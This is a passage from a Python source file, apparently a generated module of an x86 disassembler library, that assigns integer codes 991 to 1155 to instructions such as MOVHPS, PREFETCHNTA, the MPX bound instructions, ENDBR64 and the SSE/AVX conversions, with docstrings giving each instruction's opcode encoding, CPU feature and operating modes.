``VMOVLHPS xmm1, xmm2, xmm3``
``EVEX.128.0F.W0 16 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHPS_XMM_M64: int = 991
"""
``MOVHPS xmm1, m64``
``NP 0F 16 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVHPS_XMM_XMM_M64: int = 992
"""
``VMOVHPS xmm2, xmm1, m64``
``VEX.128.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHPS_XMM_XMM_M64: int = 993
"""
``VMOVHPS xmm2, xmm1, m64``
``EVEX.128.0F.W0 16 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHPD_XMM_M64: int = 994
"""
``MOVHPD xmm1, m64``
``66 0F 16 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVHPD_XMM_XMM_M64: int = 995
"""
``VMOVHPD xmm2, xmm1, m64``
``VEX.128.66.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHPD_XMM_XMM_M64: int = 996
"""
``VMOVHPD xmm2, xmm1, m64``
``EVEX.128.66.0F.W1 16 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVSHDUP_XMM_XMMM128: int = 997
"""
``MOVSHDUP xmm1, xmm2/m128``
``F3 0F 16 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VMOVSHDUP_XMM_XMMM128: int = 998
"""
``VMOVSHDUP xmm1, xmm2/m128``
``VEX.128.F3.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVSHDUP_YMM_YMMM256: int = 999
"""
``VMOVSHDUP ymm1, ymm2/m256``
``VEX.256.F3.0F.WIG 16 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVSHDUP_XMM_K1Z_XMMM128: int = 1000
"""
``VMOVSHDUP xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F3.0F.W0 16 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSHDUP_YMM_K1Z_YMMM256: int = 1001
"""
``VMOVSHDUP ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F3.0F.W0 16 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVSHDUP_ZMM_K1Z_ZMMM512: int = 1002
"""
``VMOVSHDUP zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F3.0F.W0 16 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHPS_M64_XMM: int = 1003
"""
``MOVHPS m64, xmm1``
``NP 0F 17 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVHPS_M64_XMM: int = 1004
"""
``VMOVHPS m64, xmm1``
``VEX.128.0F.WIG 17 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHPS_M64_XMM: int = 1005
"""
``VMOVHPS m64, xmm1``
``EVEX.128.0F.W0 17 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVHPD_M64_XMM: int = 1006
"""
``MOVHPD m64, xmm1``
``66 0F 17 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVHPD_M64_XMM: int = 1007
"""
``VMOVHPD m64, xmm1``
``VEX.128.66.0F.WIG 17 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVHPD_M64_XMM: int = 1008
"""
``VMOVHPD m64, xmm1``
``EVEX.128.66.0F.W1 17 /r``
``AVX512F``
``16/32/64-bit``
"""
RESERVEDNOP_RM16_R16_0F18: int = 1009
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 18 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F18: int = 1010
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 18 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F18: int = 1011
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 18 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F19: int = 1012
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 19 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F19: int = 1013
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 19 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F19: int = 1014
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 19 /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1A: int = 1015
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1A /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1A: int = 1016
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1A /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1A: int = 1017
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1A /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1B: int = 1018
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1B /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1B: int = 1019
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1B /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1B: int = 1020
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1B /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1C: int = 1021
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1C /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1C: int = 1022
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1C /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1C: int = 1023
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1C /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1D: int = 1024
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1D: int = 1025
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1D: int = 1026
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1D /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1E: int = 1027
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1E /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1E: int = 1028
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1E /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1E: int = 1029
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1E /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
RESERVEDNOP_RM16_R16_0F1F: int = 1030
"""
``RESERVEDNOP r/m16, r16``
``o16 0F 1F /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM32_R32_0F1F: int = 1031
"""
``RESERVEDNOP r/m32, r32``
``o32 0F 1F /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
RESERVEDNOP_RM64_R64_0F1F: int = 1032
"""
``RESERVEDNOP r/m64, r64``
``o64 0F 1F /r``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
PREFETCHNTA_M8: int = 1033
"""
``PREFETCHNTA m8``
``0F 18 /0``
``SSE``
``16/32/64-bit``
"""
PREFETCHT0_M8: int = 1034
"""
``PREFETCHT0 m8``
``0F 18 /1``
``SSE``
``16/32/64-bit``
"""
PREFETCHT1_M8: int = 1035
"""
``PREFETCHT1 m8``
``0F 18 /2``
``SSE``
``16/32/64-bit``
"""
PREFETCHT2_M8: int = 1036
"""
``PREFETCHT2 m8``
``0F 18 /3``
``SSE``
``16/32/64-bit``
"""
BNDLDX_BND_MIB: int = 1037
"""
``BNDLDX bnd, mib``
``NP 0F 1A /r``
``MPX``
``16/32/64-bit``
"""
BNDMOV_BND_BNDM64: int = 1038
"""
``BNDMOV bnd1, bnd2/m64``
``66 0F 1A /r``
``MPX``
``16/32-bit``
"""
BNDMOV_BND_BNDM128: int = 1039
"""
``BNDMOV bnd1, bnd2/m128``
``66 0F 1A /r``
``MPX``
``64-bit``
"""
BNDCL_BND_RM32: int = 1040
"""
``BNDCL bnd, r/m32``
``F3 0F 1A /r``
``MPX``
``16/32-bit``
"""
BNDCL_BND_RM64: int = 1041
"""
``BNDCL bnd, r/m64``
``F3 0F 1A /r``
``MPX``
``64-bit``
"""
BNDCU_BND_RM32: int = 1042
"""
``BNDCU bnd, r/m32``
``F2 0F 1A /r``
``MPX``
``16/32-bit``
"""
BNDCU_BND_RM64: int = 1043
"""
``BNDCU bnd, r/m64``
``F2 0F 1A /r``
``MPX``
``64-bit``
"""
BNDSTX_MIB_BND: int = 1044
"""
``BNDSTX mib, bnd``
``NP 0F 1B /r``
``MPX``
``16/32/64-bit``
"""
BNDMOV_BNDM64_BND: int = 1045
"""
``BNDMOV bnd1/m64, bnd2``
``66 0F 1B /r``
``MPX``
``16/32-bit``
"""
BNDMOV_BNDM128_BND: int = 1046
"""
``BNDMOV bnd1/m128, bnd2``
``66 0F 1B /r``
``MPX``
``64-bit``
"""
BNDMK_BND_M32: int = 1047
"""
``BNDMK bnd, m32``
``F3 0F 1B /r``
``MPX``
``16/32-bit``
"""
BNDMK_BND_M64: int = 1048
"""
``BNDMK bnd, m64``
``F3 0F 1B /r``
``MPX``
``64-bit``
"""
BNDCN_BND_RM32: int = 1049
"""
``BNDCN bnd, r/m32``
``F2 0F 1B /r``
``MPX``
``16/32-bit``
"""
BNDCN_BND_RM64: int = 1050
"""
``BNDCN bnd, r/m64``
``F2 0F 1B /r``
``MPX``
``64-bit``
"""
CLDEMOTE_M8: int = 1051
"""
``CLDEMOTE m8``
``NP 0F 1C /0``
``CLDEMOTE``
``16/32/64-bit``
"""
RDSSPD_R32: int = 1052
"""
``RDSSPD r32``
``F3 0F 1E /1``
``CET_SS``
``16/32/64-bit``
"""
RDSSPQ_R64: int = 1053
"""
``RDSSPQ r64``
``F3 o64 0F 1E /1``
``CET_SS``
``64-bit``
"""
ENDBR64: int = 1054
"""
``ENDBR64``
``F3 0F 1E FA``
``CET_IBT``
``16/32/64-bit``
"""
ENDBR32: int = 1055
"""
``ENDBR32``
``F3 0F 1E FB``
``CET_IBT``
``16/32/64-bit``
"""
NOP_RM16: int = 1056
"""
``NOP r/m16``
``o16 0F 1F /0``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
NOP_RM32: int = 1057
"""
``NOP r/m32``
``o32 0F 1F /0``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``16/32/64-bit``
"""
NOP_RM64: int = 1058
"""
``NOP r/m64``
``o64 0F 1F /0``
``CPUID.01H.EAX[Bits 11:8] = 0110B or 1111B``
``64-bit``
"""
MOV_R32_CR: int = 1059
"""
``MOV r32, cr``
``0F 20 /r``
``386+``
``16/32-bit``
"""
MOV_R64_CR: int = 1060
"""
``MOV r64, cr``
``0F 20 /r``
``X64``
``64-bit``
"""
MOV_R32_DR: int = 1061
"""
``MOV r32, dr``
``0F 21 /r``
``386+``
``16/32-bit``
"""
MOV_R64_DR: int = 1062
"""
``MOV r64, dr``
``0F 21 /r``
``X64``
``64-bit``
"""
MOV_CR_R32: int = 1063
"""
``MOV cr, r32``
``0F 22 /r``
``386+``
``16/32-bit``
"""
MOV_CR_R64: int = 1064
"""
``MOV cr, r64``
``0F 22 /r``
``X64``
``64-bit``
"""
MOV_DR_R32: int = 1065
"""
``MOV dr, r32``
``0F 23 /r``
``386+``
``16/32-bit``
"""
MOV_DR_R64: int = 1066
"""
``MOV dr, r64``
``0F 23 /r``
``X64``
``64-bit``
"""
MOV_R32_TR: int = 1067
"""
``MOV r32, tr``
``0F 24 /r``
``386/486/Cyrix/Geode``
``16/32-bit``
"""
MOV_TR_R32: int = 1068
"""
``MOV tr, r32``
``0F 26 /r``
``386/486/Cyrix/Geode``
``16/32-bit``
"""
MOVAPS_XMM_XMMM128: int = 1069
"""
``MOVAPS xmm1, xmm2/m128``
``NP 0F 28 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVAPS_XMM_XMMM128: int = 1070
"""
``VMOVAPS xmm1, xmm2/m128``
``VEX.128.0F.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVAPS_YMM_YMMM256: int = 1071
"""
``VMOVAPS ymm1, ymm2/m256``
``VEX.256.0F.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVAPS_XMM_K1Z_XMMM128: int = 1072
"""
``VMOVAPS xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.0F.W0 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPS_YMM_K1Z_YMMM256: int = 1073
"""
``VMOVAPS ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.0F.W0 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPS_ZMM_K1Z_ZMMM512: int = 1074
"""
``VMOVAPS zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.0F.W0 28 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVAPD_XMM_XMMM128: int = 1075
"""
``MOVAPD xmm1, xmm2/m128``
``66 0F 28 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVAPD_XMM_XMMM128: int = 1076
"""
``VMOVAPD xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVAPD_YMM_YMMM256: int = 1077
"""
``VMOVAPD ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVAPD_XMM_K1Z_XMMM128: int = 1078
"""
``VMOVAPD xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F.W1 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPD_YMM_K1Z_YMMM256: int = 1079
"""
``VMOVAPD ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F.W1 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPD_ZMM_K1Z_ZMMM512: int = 1080
"""
``VMOVAPD zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F.W1 28 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVAPS_XMMM128_XMM: int = 1081
"""
``MOVAPS xmm2/m128, xmm1``
``NP 0F 29 /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVAPS_XMMM128_XMM: int = 1082
"""
``VMOVAPS xmm2/m128, xmm1``
``VEX.128.0F.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVAPS_YMMM256_YMM: int = 1083
"""
``VMOVAPS ymm2/m256, ymm1``
``VEX.256.0F.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVAPS_XMMM128_K1Z_XMM: int = 1084
"""
``VMOVAPS xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.0F.W0 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPS_YMMM256_K1Z_YMM: int = 1085
"""
``VMOVAPS ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.0F.W0 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPS_ZMMM512_K1Z_ZMM: int = 1086
"""
``VMOVAPS zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.0F.W0 29 /r``
``AVX512F``
``16/32/64-bit``
"""
MOVAPD_XMMM128_XMM: int = 1087
"""
``MOVAPD xmm2/m128, xmm1``
``66 0F 29 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVAPD_XMMM128_XMM: int = 1088
"""
``VMOVAPD xmm2/m128, xmm1``
``VEX.128.66.0F.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVAPD_YMMM256_YMM: int = 1089
"""
``VMOVAPD ymm2/m256, ymm1``
``VEX.256.66.0F.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVAPD_XMMM128_K1Z_XMM: int = 1090
"""
``VMOVAPD xmm2/m128 {k1}{z}, xmm1``
``EVEX.128.66.0F.W1 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPD_YMMM256_K1Z_YMM: int = 1091
"""
``VMOVAPD ymm2/m256 {k1}{z}, ymm1``
``EVEX.256.66.0F.W1 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVAPD_ZMMM512_K1Z_ZMM: int = 1092
"""
``VMOVAPD zmm2/m512 {k1}{z}, zmm1``
``EVEX.512.66.0F.W1 29 /r``
``AVX512F``
``16/32/64-bit``
"""
CVTPI2PS_XMM_MMM64: int = 1093
"""
``CVTPI2PS xmm, mm/m64``
``NP 0F 2A /r``
``SSE``
``16/32/64-bit``
"""
CVTPI2PD_XMM_MMM64: int = 1094
"""
``CVTPI2PD xmm, mm/m64``
``66 0F 2A /r``
``SSE2``
``16/32/64-bit``
"""
CVTSI2SS_XMM_RM32: int = 1095
"""
``CVTSI2SS xmm1, r/m32``
``F3 0F 2A /r``
``SSE``
``16/32/64-bit``
"""
CVTSI2SS_XMM_RM64: int = 1096
"""
``CVTSI2SS xmm1, r/m64``
``F3 o64 0F 2A /r``
``SSE``
``64-bit``
"""
VEX_VCVTSI2SS_XMM_XMM_RM32: int = 1097
"""
``VCVTSI2SS xmm1, xmm2, r/m32``
``VEX.LIG.F3.0F.W0 2A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTSI2SS_XMM_XMM_RM64: int = 1098
"""
``VCVTSI2SS xmm1, xmm2, r/m64``
``VEX.LIG.F3.0F.W1 2A /r``
``AVX``
``64-bit``
"""
EVEX_VCVTSI2SS_XMM_XMM_RM32_ER: int = 1099
"""
``VCVTSI2SS xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F3.0F.W0 2A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSI2SS_XMM_XMM_RM64_ER: int = 1100
"""
``VCVTSI2SS xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F3.0F.W1 2A /r``
``AVX512F``
``64-bit``
"""
CVTSI2SD_XMM_RM32: int = 1101
"""
``CVTSI2SD xmm1, r/m32``
``F2 0F 2A /r``
``SSE2``
``16/32/64-bit``
"""
CVTSI2SD_XMM_RM64: int = 1102
"""
``CVTSI2SD xmm1, r/m64``
``F2 o64 0F 2A /r``
``SSE2``
``64-bit``
"""
VEX_VCVTSI2SD_XMM_XMM_RM32: int = 1103
"""
``VCVTSI2SD xmm1, xmm2, r/m32``
``VEX.LIG.F2.0F.W0 2A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTSI2SD_XMM_XMM_RM64: int = 1104
"""
``VCVTSI2SD xmm1, xmm2, r/m64``
``VEX.LIG.F2.0F.W1 2A /r``
``AVX``
``64-bit``
"""
EVEX_VCVTSI2SD_XMM_XMM_RM32_ER: int = 1105
"""
``VCVTSI2SD xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F2.0F.W0 2A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSI2SD_XMM_XMM_RM64_ER: int = 1106
"""
``VCVTSI2SD xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F2.0F.W1 2A /r``
``AVX512F``
``64-bit``
"""
MOVNTPS_M128_XMM: int = 1107
"""
``MOVNTPS m128, xmm1``
``NP 0F 2B /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMOVNTPS_M128_XMM: int = 1108
"""
``VMOVNTPS m128, xmm1``
``VEX.128.0F.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVNTPS_M256_YMM: int = 1109
"""
``VMOVNTPS m256, ymm1``
``VEX.256.0F.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVNTPS_M128_XMM: int = 1110
"""
``VMOVNTPS m128, xmm1``
``EVEX.128.0F.W0 2B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTPS_M256_YMM: int = 1111
"""
``VMOVNTPS m256, ymm1``
``EVEX.256.0F.W0 2B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTPS_M512_ZMM: int = 1112
"""
``VMOVNTPS m512, zmm1``
``EVEX.512.0F.W0 2B /r``
``AVX512F``
``16/32/64-bit``
"""
MOVNTPD_M128_XMM: int = 1113
"""
``MOVNTPD m128, xmm1``
``66 0F 2B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVNTPD_M128_XMM: int = 1114
"""
``VMOVNTPD m128, xmm1``
``VEX.128.66.0F.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVNTPD_M256_YMM: int = 1115
"""
``VMOVNTPD m256, ymm1``
``VEX.256.66.0F.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVNTPD_M128_XMM: int = 1116
"""
``VMOVNTPD m128, xmm1``
``EVEX.128.66.0F.W1 2B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTPD_M256_YMM: int = 1117
"""
``VMOVNTPD m256, ymm1``
``EVEX.256.66.0F.W1 2B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTPD_M512_ZMM: int = 1118
"""
``VMOVNTPD m512, zmm1``
``EVEX.512.66.0F.W1 2B /r``
``AVX512F``
``16/32/64-bit``
"""
MOVNTSS_M32_XMM: int = 1119
"""
``MOVNTSS m32, xmm1``
``F3 0F 2B /r``
``SSE4A``
``16/32/64-bit``
"""
MOVNTSD_M64_XMM: int = 1120
"""
``MOVNTSD m64, xmm1``
``F2 0F 2B /r``
``SSE4A``
``16/32/64-bit``
"""
CVTTPS2PI_MM_XMMM64: int = 1121
"""
``CVTTPS2PI mm, xmm/m64``
``NP 0F 2C /r``
``SSE``
``16/32/64-bit``
"""
CVTTPD2PI_MM_XMMM128: int = 1122
"""
``CVTTPD2PI mm, xmm/m128``
``66 0F 2C /r``
``SSE2``
``16/32/64-bit``
"""
CVTTSS2SI_R32_XMMM32: int = 1123
"""
``CVTTSS2SI r32, xmm1/m32``
``F3 0F 2C /r``
``SSE``
``16/32/64-bit``
"""
CVTTSS2SI_R64_XMMM32: int = 1124
"""
``CVTTSS2SI r64, xmm1/m32``
``F3 o64 0F 2C /r``
``SSE``
``64-bit``
"""
VEX_VCVTTSS2SI_R32_XMMM32: int = 1125
"""
``VCVTTSS2SI r32, xmm1/m32``
``VEX.LIG.F3.0F.W0 2C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTTSS2SI_R64_XMMM32: int = 1126
"""
``VCVTTSS2SI r64, xmm1/m32``
``VEX.LIG.F3.0F.W1 2C /r``
``AVX``
``64-bit``
"""
EVEX_VCVTTSS2SI_R32_XMMM32_SAE: int = 1127
"""
``VCVTTSS2SI r32, xmm1/m32{sae}``
``EVEX.LIG.F3.0F.W0 2C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTSS2SI_R64_XMMM32_SAE: int = 1128
"""
``VCVTTSS2SI r64, xmm1/m32{sae}``
``EVEX.LIG.F3.0F.W1 2C /r``
``AVX512F``
``64-bit``
"""
CVTTSD2SI_R32_XMMM64: int = 1129
"""
``CVTTSD2SI r32, xmm1/m64``
``F2 0F 2C /r``
``SSE2``
``16/32/64-bit``
"""
CVTTSD2SI_R64_XMMM64: int = 1130
"""
``CVTTSD2SI r64, xmm1/m64``
``F2 o64 0F 2C /r``
``SSE2``
``64-bit``
"""
VEX_VCVTTSD2SI_R32_XMMM64: int = 1131
"""
``VCVTTSD2SI r32, xmm1/m64``
``VEX.LIG.F2.0F.W0 2C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTTSD2SI_R64_XMMM64: int = 1132
"""
``VCVTTSD2SI r64, xmm1/m64``
``VEX.LIG.F2.0F.W1 2C /r``
``AVX``
``64-bit``
"""
EVEX_VCVTTSD2SI_R32_XMMM64_SAE: int = 1133
"""
``VCVTTSD2SI r32, xmm1/m64{sae}``
``EVEX.LIG.F2.0F.W0 2C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTTSD2SI_R64_XMMM64_SAE: int = 1134
"""
``VCVTTSD2SI r64, xmm1/m64{sae}``
``EVEX.LIG.F2.0F.W1 2C /r``
``AVX512F``
``64-bit``
"""
CVTPS2PI_MM_XMMM64: int = 1135
"""
``CVTPS2PI mm, xmm/m64``
``NP 0F 2D /r``
``SSE``
``16/32/64-bit``
"""
CVTPD2PI_MM_XMMM128: int = 1136
"""
``CVTPD2PI mm, xmm/m128``
``66 0F 2D /r``
``SSE2``
``16/32/64-bit``
"""
CVTSS2SI_R32_XMMM32: int = 1137
"""
``CVTSS2SI r32, xmm1/m32``
``F3 0F 2D /r``
``SSE``
``16/32/64-bit``
"""
CVTSS2SI_R64_XMMM32: int = 1138
"""
``CVTSS2SI r64, xmm1/m32``
``F3 o64 0F 2D /r``
``SSE``
``64-bit``
"""
VEX_VCVTSS2SI_R32_XMMM32: int = 1139
"""
``VCVTSS2SI r32, xmm1/m32``
``VEX.LIG.F3.0F.W0 2D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTSS2SI_R64_XMMM32: int = 1140
"""
``VCVTSS2SI r64, xmm1/m32``
``VEX.LIG.F3.0F.W1 2D /r``
``AVX``
``64-bit``
"""
EVEX_VCVTSS2SI_R32_XMMM32_ER: int = 1141
"""
``VCVTSS2SI r32, xmm1/m32{er}``
``EVEX.LIG.F3.0F.W0 2D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSS2SI_R64_XMMM32_ER: int = 1142
"""
``VCVTSS2SI r64, xmm1/m32{er}``
``EVEX.LIG.F3.0F.W1 2D /r``
``AVX512F``
``64-bit``
"""
CVTSD2SI_R32_XMMM64: int = 1143
"""
``CVTSD2SI r32, xmm1/m64``
``F2 0F 2D /r``
``SSE2``
``16/32/64-bit``
"""
CVTSD2SI_R64_XMMM64: int = 1144
"""
``CVTSD2SI r64, xmm1/m64``
``F2 o64 0F 2D /r``
``SSE2``
``64-bit``
"""
VEX_VCVTSD2SI_R32_XMMM64: int = 1145
"""
``VCVTSD2SI r32, xmm1/m64``
``VEX.LIG.F2.0F.W0 2D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VCVTSD2SI_R64_XMMM64: int = 1146
"""
``VCVTSD2SI r64, xmm1/m64``
``VEX.LIG.F2.0F.W1 2D /r``
``AVX``
``64-bit``
"""
EVEX_VCVTSD2SI_R32_XMMM64_ER: int = 1147
"""
``VCVTSD2SI r32, xmm1/m64{er}``
``EVEX.LIG.F2.0F.W0 2D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTSD2SI_R64_XMMM64_ER: int = 1148
"""
``VCVTSD2SI r64, xmm1/m64{er}``
``EVEX.LIG.F2.0F.W1 2D /r``
``AVX512F``
``64-bit``
"""
UCOMISS_XMM_XMMM32: int = 1149
"""
``UCOMISS xmm1, xmm2/m32``
``NP 0F 2E /r``
``SSE``
``16/32/64-bit``
"""
VEX_VUCOMISS_XMM_XMMM32: int = 1150
"""
``VUCOMISS xmm1, xmm2/m32``
``VEX.LIG.0F.WIG 2E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUCOMISS_XMM_XMMM32_SAE: int = 1151
"""
``VUCOMISS xmm1, xmm2/m32{sae}``
``EVEX.LIG.0F.W0 2E /r``
``AVX512F``
``16/32/64-bit``
"""
UCOMISD_XMM_XMMM64: int = 1152
"""
``UCOMISD xmm1, xmm2/m64``
``66 0F 2E /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VUCOMISD_XMM_XMMM64: int = 1153
"""
``VUCOMISD xmm1, xmm2/m64``
``VEX.LIG.66.0F.WIG 2E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VUCOMISD_XMM_XMMM64_SAE: int = 1154
"""
``VUCOMISD xmm1, xmm2/m64{sae}``
``EVEX.LIG.66.0F.W1 2E /r``
``AVX512F``
``16/32/64-bit``
"""
COMISS_XMM_XMMM32: int = 1155
"""
``COMISS xmm1, xmm2/m32``
